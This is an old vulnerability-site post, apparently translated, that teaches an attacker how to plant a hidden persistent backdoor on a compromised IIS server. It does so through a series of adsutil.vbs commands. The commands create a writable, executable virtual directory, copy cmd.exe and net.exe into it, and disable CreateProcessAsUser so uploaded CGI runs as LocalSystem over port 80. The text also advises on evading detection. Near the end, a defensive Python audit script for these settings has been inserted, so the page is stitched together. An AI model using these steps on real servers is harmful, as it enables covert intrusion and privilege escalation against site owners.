The real permanent IIS backdoor, decrypted - vulnerability warning - Black Bar Safety Net

ID MYHACK58:62200716691
Type myhack58
Reporter Anonymous
Modified 2007-08-27T00:00:00


IIS is one of the most popular web servers, and the number of misconfigurations found on it is large. After breaking into an IIS server you leave a backdoor so that you can control it at any time. Usually a backdoor opens a special port and listens on it; nc, ntlm, rnc and the like are all telnet-style tools where the server side listens for a remote connection and is controlled over it. But on a tightly run site, administrators who have already been burned will usually restrict ports at the firewall, so apart from the ports the administrator opened, nothing else can be connected to. Port 80, however, cannot be closed unless the administrator no longer cares about the site at all. So we can leave the backdoor on port 80 and have a permanent backdoor.

When IIS starts a CGI application, by default it uses the CreateProcessAsUser API to create the new CGI process, so the program's security context is determined by the user who started the CGI. Normally an anonymous user is mapped to the IUSR_computername account (the administrator can of course map it to some other account), or it is the legitimate user whose credentials the browser supplied. Both of these users have fairly low privileges and may all be members of the Guests group. In fact, we can change the way IIS runs CGI to raise that privilege. The IIS main process itself runs under the LocalSystem account, so we can obtain the highest privilege, LocalSystem.

After breaking into the web server, you can generally bind a cmd to a port to control the server remotely. Then you can have GUI remote control, such as 3389, or telnet-style text-mode control, such as rnc. nc certainly works; in fact that is enough.

1. telnet to the server

2. cscript.exe adsutil.vbs enum w3svc/1/root

KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "default application"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
AccessScript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
  "400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
  "401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
  "401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
  "401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
  "401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
  "401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
  "403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
  "403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
  "403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
  "403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
  "403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
  "403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
  "403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
  "403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
  "403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
  "403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
  "403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
  "403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
  "403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
  "403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
  "403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
  "403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
  "404,,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
  "405,,FILE,C:\WINNT\help\iisHelp\common\405.htm"
  "406,,FILE,C:\WINNT\help\iisHelp\common\406.htm"
  "407,,FILE,C:\WINNT\help\iisHelp\common\407.htm"
  "412,,FILE,C:\WINNT\help\iisHelp\common\412.htm"
  "414,,FILE,C:\WINNT\help\iisHelp\common\414.htm"
  "500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
  "500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
  "500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
  "500,100,URL,/iisHelp/common/500-100.asp"
FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:\inetpub\wwwroot"
An : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]

Don't tell me you don't know what the output above is!!!!

Now we know where we stand, don't we! Oh, the administrator is about to have some bad luck.

3. mkdir c:\inetpub\wwwroot\dir1

4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:\inetpub\wwwroot\dir1"

This sets up a virtual directory: Virtual Dir1

You can look at it with the enum command above.

5. The next step is to change the attributes of Virtual Dir1 to allow execution

cscript.exe adsutil.vbs set "w3svc/1/root/Virtual Dir1/accesswrite" "true" -s:
cscript.exe adsutil.vbs set "w3svc/1/root/Virtual Dir1/accessexecute" "true" -s:

Now you can upload content to the directory and it can be run. You can also copy cmd.exe and net.exe directly into the virtual directory's folder on disk.

6. The following command modifies the IIS metabase to force IIS to create the new CGI process in its own security context

cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false

Note: cscript is the Windows Script Host.

adsutil.vbs is the Windows IIS administration script.

What follows it is the IIS metabase path.
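As an added defensive check, not part of the original article: a Python audit that parses the `Name : (TYPE) value` lines that adsutil.vbs enum prints (as in step 2) and flags the two settings this backdoor relies on, a virtual directory that is both writable and executable, and CreateProcessAsUser explicitly set to False. The enumerated output is a constructed sample, and parse_adsutil, audit_vdir and audit are names of my own.

```python
import re
# Constructed sample of the "Name : (TYPE) value" layout that
# `cscript adsutil.vbs enum <path>` prints; the second node is a
# constructed instance of the misconfiguration described on this page.
SAMPLE_ENUM = {
    "w3svc/1/root": """\
KeyType : (STRING) "IIsWebVirtualDir"
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
Path : (STRING) "c:\\inetpub\\wwwroot"
""",
    "w3svc/1/root/Virtual Dir1": """\
KeyType : (STRING) "IIsWebVirtualDir"
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) True
AccessExecute : (BOOLEAN) True
CreateProcessAsUser : (BOOLEAN) False
Path : (STRING) "c:\\inetpub\\wwwroot\\dir1"
""",
}

LINE_RE = re.compile(r"^(\w+)\s*:\s*\((\w+)\)\s*(.*)$")

def parse_adsutil(text):
    """Map adsutil enum lines to property -> typed value; other lines are skipped."""
    props = {}
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        name, typ, raw = m.groups()
        if typ == "BOOLEAN":
            props[name] = raw.strip().lower() == "true"
        elif typ == "INTEGER":
            props[name] = int(raw)
        else:  # STRING, LIST and anything else stay as text
            props[name] = raw.strip().strip('"')
    return props

def audit_vdir(path, props):
    """Return one finding per risky setting on a virtual directory."""
    findings = []
    if props.get("AccessWrite") and props.get("AccessExecute"):
        findings.append(f"{path}: AccessWrite and AccessExecute both True (upload-and-run)")
    # The metabase default is True, so only an explicit False is reported.
    if props.get("CreateProcessAsUser", True) is False:
        findings.append(f"{path}: CreateProcessAsUser False (CGI inherits the IIS process token)")
    return findings

def audit(enum_outputs):
    return [f for path, text in enum_outputs.items()
            for f in audit_vdir(path, parse_adsutil(text))]
```

Feed it the real enum output of every node under w3svc/<site>/root; a clean directory such as the root above yields no findings, while the planted one yields two.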

So this backdoor is almost impossible to detect, unless the administrator goes through every virtual directory all over again; only an administrator who has already written his suicide note would go and search for it.